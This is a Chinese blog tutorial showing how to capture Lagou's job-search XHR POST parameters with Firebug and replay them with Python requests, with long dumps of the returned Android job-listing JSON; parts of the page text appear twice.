教育","score":1320,"district":"鼓楼区","companyLabelList":["节日礼物","带薪年假","补充医保","补充子女医保"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462333319000,"positonTypesMap":null,"hrScore":88,"flowScore":143,"showCount":3161,"pvScore":79.41660570401937,"plus":"是","businessZones":["虎踞路","龙江","西桥"],"publisherId":2230973,"loginTime":1462871511000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":41,"adWord":0,"formatCreateTime":"2016-05-04","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:26:58","companyId":103051,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"浙江米果网络股份有限公司","city":"杭州","salary":"12k-22k","financeStage":"成长型(A轮)","positionId":1233873,"companyLogo":"image2/M00/10/DF/CgqLKVYwKQSAR2p4AAJAM590SJM137.png?cc=0.17502541467547417","positionFirstType":"技术","companyName":"米果小站","positionAdvantage":"充分的发展成长空间","industryField":"移动互联网","score":1320,"district":"滨江区","companyLabelList":["年底双薪","股票期权","午餐补助","五险一金"],"deliverCount":5,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462843618000,"positonTypesMap":null,"hrScore":72,"flowScore":137,"showCount":1582,"pvScore":87.93158026917071,"plus":"是","businessZones":["江南","长河","西兴"],"publisherId":2992735,"loginTime":1462889479000,"appShow":312,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"09:26发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 10:01:39","companyId":70044,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"武汉平行世界网络科技有限公司","city":"武汉","salary":"9k-13k","financeStage":"初创型(天使轮)","positionId":664813,"companyLogo":"image2/M00/00/3E/CgqLKVXdccSAQE91AACv-6V33Vo860.jpg","positionFirstType":"技术","companyName":"平行世界","positionAdvantage":"弹性工作、带薪年假、待遇优厚、3号线直达","industryField":"电子商务 · 文化娱乐","score":1320,"district":"蔡甸区","companyLabelList":["年底双薪","待遇优厚","专项奖金","带薪年假"],"deliverCount":18,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462845699000,"positonTypesMap":null,"hrScore":76,"flowScore":128,"showCount":1934,"pvScore":99.6001810598155,"plus":"是","businessZones":["沌口"],"publisherId":1694134,"loginTime":1462892151000,"appShow":759,"calcScore":false,"showOrder":1433141412915,"haveDeliver":false,"orderBy":68,"adWord":0,"formatCreateTime":"10:01发布","totalCount":0,"searchScore":0.0}]}}}












在XHR中点击JSON,就可以看到浏览器返回来的数据了。 是不是跟上面使用python程序抓取的一样呢?
 





 
是不是很简单?
 
如果想获得第2页,第3页的数据呢?
 
只需要修改pn=x 中的值就可以了。post_data = {'first':'true','kd':'Android','pn':'2'} #获取第2页的内容
如果想要获取全部内容,写一个循环语句就可以了。
 
版权所有,转载请说明出处:www.30daydo.com
  查看全部
针对一些JS网页,动态网页在源码中无法看到它的内容,可以通过抓包分析出其JSON格式的数据。 网页通过通过这些JSON数据对网页的内容进行填充,然后就看到网页里显示相关的内容了。
 
使用过chrome,firefox,wireshark来抓过包,比较方便的是chrome,不需要安装第三方的其它插件,不过打开新页面的时候又要重新开一个捕捉页面,会错过一些实时的数据。 
 
wireshark需要专门掌握它自己的过滤规则,学习成本摆在那里。 
 
最好用的还是firefox+firebug第三方插件。
 
接下来以拉勾网为例。
 
打开firebug功能
 
www.lagou.com 在左侧栏随便点击一个岗位,以android为例 
 

Android招聘-招聘求职信息-拉勾网.png

 
在firebug中,需要点击“网络”选项卡,然后选择XHR。
 

post.jpg

 
Post的信息就是我们需要关注的,点击post的链接
 

post_data.jpg

 
点击了Android之后 我们从浏览器上传了几个参数到拉勾的服务器
一个是 first =true, 一个是kd = android, (关键字) 一个是pn =1 (page number 页码)
 
所以我们就可以模仿这一个步骤来构造一个数据包来模拟用户的点击动作。
post_data = {'first':'true','kd':'Android','pn':'1'}

然后使用python中库中最简单的requests库来提交数据。 而这些数据 正是抓包里看到的数据。
import requests

url = "http://www.lagou.com/jobs/posi ... ot%3B
return_data=requests.post(url,data=post_data)
print return_data.text


呐,打印出来的数据就是返回来的json数据
{"code":0,"success":true,"requestId":null,"resubmitToken":null,"msg":null,"content":{"pageNo":1,"pageSize":15,"positionResult":{"totalCount":5000,"pageSize":15,"locationInfo":{"city":null,"district":null,"businessZone":null},"result":[{"createTime":"2016-05-05 17:27:50","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1455217,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术极客云集","industryField":"移动互联网 · 企业服务","score":1372,"district":"西城区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":13,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462440470000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":6627,"pvScore":73.2258060280967,"plus":"是","businessZones":["新街口","德胜门","小西天"],"publisherId":994817,"loginTime":1462876049000,"appShow":3141,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-05 18:30:16","companyId":50889,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"和创(北京)科技股份有限公司","city":"北京","salary":"20k-35k","financeStage":"上市公司","positionId":1440576,"companyLogo":"i/image/M00/03/44/Cgp3O1ax7JWAOSzUAABS3OF0A7w289.jpg","positionFirstType":"技术","companyName":"和创科技(红圈营销)","positionAdvantage":"上市公司,持续股权激励政策,技术爆棚!","industryField":"移动互联网 · 企业服务","score":1372,"district":"海淀区","companyLabelList":["弹性工作","敏捷研发","股票期权","年底双薪"],"deliverCount":6,"leaderName":"刘学臣","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462444216000,"positonTypesMap":null,"hrScore":77,"flowScore":148,"showCount":3214,"pvScore":73.37271526202157,"plus":"是","businessZones":["双榆树","中关村","大钟寺"],"publisherId":994817,"loginTime":1462876049000,"appShow":1782,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":99,"adWord":1,"formatCreateTime":"2016-05-05","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 18:41:29","companyId":94307,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"宁波海大物联科技有限公司","city":"宁波","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1070249,"companyLogo":"image2/M00/03/32/CgqLKVXtWiuAUbXgAAB1g_5FW3Y484.png?cc=0.6152940313331783","positionFirstType":"技术","companyName":"海大物联","positionAdvantage":"一流的技术团队,丰厚的薪资回报。","industryField":"移动互联网 · 企业服务","score":1353,"district":"鄞州区","companyLabelList":["节日礼物","年底双薪","带薪年假","年度旅游"],"deliverCount":0,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462876889000,"positonTypesMap":null,"hrScore":75,"flowScore":167,"showCount":1031,"pvScore":47.6349840620252,"plus":"是","businessZones":null,"publisherId":2494230,"loginTime":1462885305000,"appShow":184,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"18:41发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 17:57:43","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1387825,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业项目。优质福利待遇+期权","industryField":"移动互联网 · 医疗健康","score":1344,"district":"江干区","companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":5,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874263000,"positonTypesMap":null,"hrScore":74,"flowScore":153,"showCount":1312,"pvScore":66.87818057124453,"plus":"是","businessZones":["四季青","景芳"],"publisherId":3655492,"loginTime":1462873104000,"appShow":573,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:49:47","companyId":15071,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州短趣网络传媒技术有限公司","city":"杭州","salary":"10k-20k","financeStage":"成长型(A轮)","positionId":1803257,"companyLogo":"image2/M00/0B/80/CgpzWlYYse2AJgc0AABG9iSEWAE052.jpg","positionFirstType":"技术","companyName":"短趣网","positionAdvantage":"高额项目奖金,行业内有竞争力的薪资水平","industryField":"移动互联网 · 社交网络","score":1343,"district":null,"companyLabelList":["绩效奖金","年终分红","五险一金","通讯津贴"],"deliverCount":1,"leaderName":"王强宇","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":28,"imstate":"today","createTimeSort":1462859387000,"positonTypesMap":null,"hrScore":68,"flowScore":178,"showCount":652,"pvScore":32.82081357576065,"plus":"否","businessZones":null,"publisherId":4362468,"loginTime":1462870318000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"13:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:55:08","companyId":28422,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"成都品果科技有限公司","city":"北京","salary":"18k-30k","financeStage":"成长型(B轮)","positionId":290875,"companyLogo":"i/image/M00/02/F3/Cgp3O1ah7FuAbSnkAACMlcPiWXk393.png","positionFirstType":"技术","companyName":"camera360","positionAdvantage":"高大上的福利待遇、发展前景等着你哦!","industryField":"移动互联网","score":1339,"district":"海淀区","companyLabelList":["年终分红","绩效奖金","年底双薪","五险一金"],"deliverCount":6,"leaderName":"徐灏","companySize":"15-50人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462859708000,"positonTypesMap":null,"hrScore":80,"flowScore":188,"showCount":1199,"pvScore":19.745453118211834,"plus":"是","businessZones":["中关村","北京大学","苏州街"],"publisherId":389753,"loginTime":1462866640000,"appShow":0,"calcScore":false,"showOrder":1433137697136,"haveDeliver":false,"orderBy":71,"adWord":0,"formatCreateTime":"13:55发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 17:57:55","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"不限","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1410975,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业团队","industryField":"移动互联网 · 医疗健康","score":1335,"district":null,"companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":9,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874275000,"positonTypesMap":null,"hrScore":74,"flowScore":144,"showCount":2085,"pvScore":77.9570832081189,"plus":"是","businessZones":null,"publisherId":3655492,"loginTime":1462873104000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-09 09:46:32","companyId":113895,"positionName":"Android开发工程师","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"北京互动金服科技有限公司","city":"北京","salary":"15k-25k","financeStage":"成长型(不需要融资)","positionId":1473342,"companyLogo":"i/image/M00/03/D8/CgqKkVbEA_uAe1k4AAHTfy3RxPY812.jpg","positionFirstType":"技术","companyName":"互动科技","positionAdvantage":"五险一金 补充医疗 年终奖 福利津贴","industryField":"移动互联网 · O2O","score":1326,"district":"海淀区","companyLabelList":,"deliverCount":32,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462758392000,"positonTypesMap":null,"hrScore":82,"flowScore":153,"showCount":3741,"pvScore":67.01698353391613,"plus":"是","businessZones":["白石桥","魏公村","万寿寺","白石桥","魏公村","万寿寺"],"publisherId":3814477,"loginTime":1462874842000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"1天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 16:50:51","companyId":23999,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京智鹤电子科技有限公司","city":"长沙","salary":"8k-12k","financeStage":"成长型(A轮)","positionId":1804917,"companyLogo":"image1/M00/35/EB/CgYXBlWc5KGAVeL8AAAOi4lPhWU502.jpg","positionFirstType":"技术","companyName":"智鹤科技","positionAdvantage":"弹性工作制 技术氛围浓厚","industryField":"移动互联网","score":1322,"district":null,"companyLabelList":["股票期权","绩效奖金","专项奖金","年终分红"],"deliverCount":1,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462870251000,"positonTypesMap":null,"hrScore":62,"flowScore":191,"showCount":283,"pvScore":15.939035855045429,"plus":"否","businessZones":null,"publisherId":282621,"loginTime":1462869967000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"16:50发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-08 23:12:56","companyId":24287,"positionName":"android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州腾展科技有限公司","city":"杭州","salary":"15k-22k","financeStage":"成熟型(D轮及以上)","positionId":1197868,"companyLogo":"image1/M00/0B/7D/Cgo8PFTzIBOAEd2dAACMq9tQoMA797.png","positionFirstType":"技术","companyName":"腾展叮咚(Dingtone)","positionAdvantage":"每半年调整薪资,今年上市!","industryField":"移动互联网 · 社交网络","score":1322,"district":"西湖区","companyLabelList":["出国旅游","股票期权","精英团队","强悍的创始人"],"deliverCount":9,"leaderName":"魏松祥(Steve Wei)","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462720376000,"positonTypesMap":null,"hrScore":71,"flowScore":137,"showCount":3786,"pvScore":87.51582865460942,"plus":"是","businessZones":["文三路","古荡","高新文教区"],"publisherId":2946659,"loginTime":1462891920000,"appShow":940,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"2天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:38:43","companyId":19875,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"维沃移动通信有限公司","city":"南京","salary":"12k-24k","financeStage":"初创型(未融资)","positionId":938099,"companyLogo":"image1/M00/00/25/Cgo8PFTUWH-Ab57wAABKOdLbNuw116.png","positionFirstType":"技术","companyName":"vivo","positionAdvantage":"vivo,追求极致","industryField":"移动互联网","score":1320,"district":"建邺区","companyLabelList":["年终分红","五险一金","带薪年假","年度旅游"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462844323000,"positonTypesMap":null,"hrScore":57,"flowScore":149,"showCount":981,"pvScore":72.14107985481958,"plus":"是","businessZones":["沙洲","小行","赛虹桥"],"publisherId":302876,"loginTime":1462871424000,"appShow":353,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"09:38发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:49:59","companyId":20473,"positionName":"安卓开发工程师","positionType":"移动开发","workYear":"3-5年","education":"大专","jobNature":"全职","companyShortName":"广州棒谷网络科技有限公司","city":"广州","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1733545,"companyLogo":"image1/M00/0F/36/Cgo8PFT9AgGAciySAAA1THfEIAE433.jpg","positionFirstType":"技术","companyName":"广州棒谷网络科技有限公司","positionAdvantage":"五险一金 大平台 带薪休假","industryField":"电子商务","score":1320,"district":null,"companyLabelList":["项目奖金","绩效奖金","年终奖","五险一金"],"deliverCount":15,"leaderName":"大邹","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462844999000,"positonTypesMap":null,"hrScore":79,"flowScore":144,"showCount":3943,"pvScore":77.78928844199473,"plus":"是","businessZones":null,"publisherId":235413,"loginTime":1462878251000,"appShow":1562,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"09:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-04 11:41:59","companyId":87117,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京信通科技有限责任公司","city":"南京","salary":"10k-12k","financeStage":"成长型(不需要融资)","positionId":966059,"companyLogo":"image1/M00/3F/51/CgYXBlXASfuADyOsAAA_na14zho635.jpg?cc=0.6724986131303012","positionFirstType":"技术","companyName":"联创集团信通科技","positionAdvantage":"提供完善的福利和薪酬晋升制度","industryField":"移动互联网 · 教育","score":1320,"district":"鼓楼区","companyLabelList":["节日礼物","带薪年假","补充医保","补充子女医保"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462333319000,"positonTypesMap":null,"hrScore":88,"flowScore":143,"showCount":3161,"pvScore":79.41660570401937,"plus":"是","businessZones":["虎踞路","龙江","西桥"],"publisherId":2230973,"loginTime":1462871511000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":41,"adWord":0,"formatCreateTime":"2016-05-04","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:26:58","companyId":103051,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"浙江米果网络股份有限公司","city":"杭州","salary":"12k-22k","financeStage":"成长型(A轮)","positionId":1233873,"companyLogo":"image2/M00/10/DF/CgqLKVYwKQSAR2p4AAJAM590SJM137.png?cc=0.17502541467547417","positionFirstType":"技术","companyName":"米果小站","positionAdvantage":"充分的发展成长空间","industryField":"移动互联网","score":1320,"district":"滨江区","companyLabelList":["年底双薪","股票期权","午餐补助","五险一金"],"deliverCount":5,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462843618000,"positonTypesMap":null,"hrScore":72,"flowScore":137,"showCount":1582,"pvScore":87.93158026917071,"plus":"是","businessZones":["江南","长河","西兴"],"publisherId":2992735,"loginTime":1462889479000,"appShow":312,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"09:26发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 10:01:39","companyId":70044,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"武汉平行世界网络科技有限公司","city":"武汉","salary":"9k-13k","financeStage":"初创型(天使轮)","positionId":664813,"companyLogo":"image2/M00/00/3E/CgqLKVXdccSAQE91AACv-6V33Vo860.jpg","positionFirstType":"技术","companyName":"平行世界","positionAdvantage":"弹性工作、带薪年假、待遇优厚、3号线直达","industryField":"电子商务 · 文化娱乐","score":1320,"district":"蔡甸区","companyLabelList":["年底双薪","待遇优厚","专项奖金","带薪年假"],"deliverCount":18,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462845699000,"positonTypesMap":null,"hrScore":76,"flowScore":128,"showCount":1934,"pvScore":99.6001810598155,"plus":"是","businessZones":["沌口"],"publisherId":1694134,"loginTime":1462892151000,"appShow":759,"calcScore":false,"showOrder":1433141412915,"haveDeliver":false,"orderBy":68,"adWord":0,"formatCreateTime":"10:01发布","totalCount":0,"searchScore":0.0}]}}}












在XHR中点击JSON,就可以看到浏览器返回来的数据了。 是不是跟上面使用python程序抓取的一样呢?
 

dom_data.jpg

 
是不是很简单?
 
如果想获得第2页,第3页的数据呢?
 
只需要修改pn=x 中的值就可以了。
post_data = {'first':'true','kd':'Android','pn':'2'} #获取第2页的内容

如果想要获取全部内容,写一个循环语句就可以了。
 
版权所有,转载请说明出处:www.30daydo.com